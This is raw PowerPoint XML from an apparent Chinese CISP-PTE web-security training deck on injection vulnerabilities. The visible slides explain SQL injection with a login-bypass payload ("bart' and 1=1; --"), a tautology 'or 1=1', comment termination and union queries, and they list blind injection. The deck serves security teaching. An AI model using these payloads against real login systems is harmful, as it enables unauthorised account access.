              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用会执行：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接收发送的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取用户名和密码：（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>simpson</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>构建</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>select * from users where username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' and password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>simpson</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发送给数据库服务器来验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个时候，我们可以对</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进行变化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输入的用户名不是简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>而是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' and 1=1; --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这样整个语句变成如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>select * from users where username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>bart</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>' and 1=1; -- ' and password = '</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>simpson</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>这个时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>后面的都会变成注释，不用密码就能进行登陆。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6972300" y="1052736"/>
            <a:ext cx="4610100" cy="1460500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1363734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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>简单注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>simple SQL injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>永真式：最后加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 来保证无论如何都能获取数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误语句：让</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用构造错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句来抛异常，来判断数据库类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>结束注释：使用注释符注释剩余语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>联合查询：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>union all</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，后面可以写我要查询的真正语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>盲注（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Blind SQL injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般我们可以根据返回数据获取我们想要的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>但一些页面，我们是获取不到详细信息。信息只有正确或不正确。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166284681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C00000"/>
            </a:gs>
            <a:gs pos="80000">
              <a:srgbClr val="70201E"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:shade val="94000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
        </a:gradFill>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr b="1" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="2">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="谷安模板-1.potx" id="{20370F93-E01C-46B9-8133-FC051707147A}" vid="{288D7D58-60AC-41C3-82B0-33C6BDCAB984}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="gooan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C00000"/>
            </a:gs>
            <a:gs pos="80000">
              <a:srgbClr val="70201E"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:shade val="94000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
        </a:gradFill>
      </a:spPr>
      <a:bodyPr rtlCol="0" anchor="ctr"/>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr b="1" dirty="0"/>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="1">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="2">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
  <a:extLst>
    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="gooann" id="{B3505433-59A5-6646-97E7-6033771F0962}" vid="{C4BE278A-D352-A14C-8A72-5E8A33244176}"/>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谷安模板-1</Template>
  <TotalTime>34886</TotalTime>
  <Words>4984</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>667</Paragraphs>
  <Slides>70</Slides>
  <Notes>28</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70</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="82" baseType="lpstr">
      <vt:lpstr>Adobe 黑体 Std R</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>华文新魏</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>gooann</vt:lpstr>
      <vt:lpstr>CISP-PTE   Web 安全基础(2) – 注入漏洞</vt:lpstr>
      <vt:lpstr>注入漏洞</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>什么是SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入漏洞对于数据安全的影响</vt:lpstr>
      <vt:lpstr>SQL注入原理</vt:lpstr>
      <vt:lpstr>SQL注入漏洞的方法</vt:lpstr>
      <vt:lpstr>SQL注入类型</vt:lpstr>
      <vt:lpstr>各个数据库注入方式</vt:lpstr>
      <vt:lpstr>注入例子</vt:lpstr>
      <vt:lpstr>如何防护SQL注入</vt:lpstr>
      <vt:lpstr>如何防护SQL注入 – 续</vt:lpstr>
      <vt:lpstr>SQL注入测试工具</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（0）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（0）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（1）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（1）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（2）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（2）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（3）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（3）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（4）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（4）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（5）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（5）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（6）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（6）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（7）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（7）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（8）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（8）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（9）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（9）答案</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（10）</vt:lpstr>
      <vt:lpstr>SQL注入实例 – SQLol（10）答案</vt:lpstr>
      <vt:lpstr>SQL注入 - SQL Server数据库注入(1)</vt:lpstr>
      <vt:lpstr>SQL注入 - SQL Server数据库注入(2)</vt:lpstr>
      <vt:lpstr>SQL注入 - SQL Server数据库注入(2)答案</vt:lpstr>
      <vt:lpstr>XML注入</vt:lpstr>
      <vt:lpstr>XML注入</vt:lpstr>
      <vt:lpstr>什么是XML注入漏洞</vt:lpstr>
      <vt:lpstr>XML注入产生的原因</vt:lpstr>
      <vt:lpstr>XML注入漏洞例子</vt:lpstr>
      <vt:lpstr>XML注入漏洞例子（续）</vt:lpstr>
      <vt:lpstr>XML注入漏洞例子（续）</vt:lpstr>
      <vt:lpstr>如何防御XML注入</vt:lpstr>
      <vt:lpstr>代码注入</vt:lpstr>
      <vt:lpstr>代码注入</vt:lpstr>
      <vt:lpstr>远程文件包含漏洞</vt:lpstr>
      <vt:lpstr>什么是远程文件包含漏洞</vt:lpstr>
      <vt:lpstr>远程文件包含漏洞风险</vt:lpstr>
      <vt:lpstr>如何利用远程文件包含漏洞</vt:lpstr>
      <vt:lpstr>远程文件包含漏洞代码审计方法</vt:lpstr>
      <vt:lpstr>如何修复远程文件包含漏洞</vt:lpstr>
      <vt:lpstr>本地文件包含漏洞</vt:lpstr>
      <vt:lpstr>本地文件包含漏洞</vt:lpstr>
      <vt:lpstr>本地文件包含漏洞所用到的函数</vt:lpstr>
      <vt:lpstr>本地文件包含漏洞利用方式</vt:lpstr>
      <vt:lpstr>PHP文件中的封装协议 – 访问本地文件</vt:lpstr>
      <vt:lpstr>PHP文件中的封装协议 – 代码任意执行</vt:lpstr>
      <vt:lpstr>PHP文件中的封装协议 – 目录遍历</vt:lpstr>
      <vt:lpstr>如何修复本地文件包含漏洞</vt:lpstr>
      <vt:lpstr>命令执行漏洞</vt:lpstr>
      <vt:lpstr>命令行注入漏洞</vt:lpstr>
      <vt:lpstr>命令注入漏洞对系统安全产生的危害</vt:lpstr>
      <vt:lpstr>各种语言执行系统命令的函数</vt:lpstr>
      <vt:lpstr>命令注入漏洞例子</vt:lpstr>
      <vt:lpstr>第三方组件存在的代码执行漏洞</vt:lpstr>
      <vt:lpstr>命令注入漏洞的修复方法</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Linux系统管理与安全</dc:title>
  <dc:creator>高智震</dc:creator>
  <cp:lastModifiedBy>金炫臻</cp:lastModifiedBy>
  <cp:revision>2807</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-23T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-08T12:05:37Z</dcterms:modified>
</cp:coreProperties>
</file>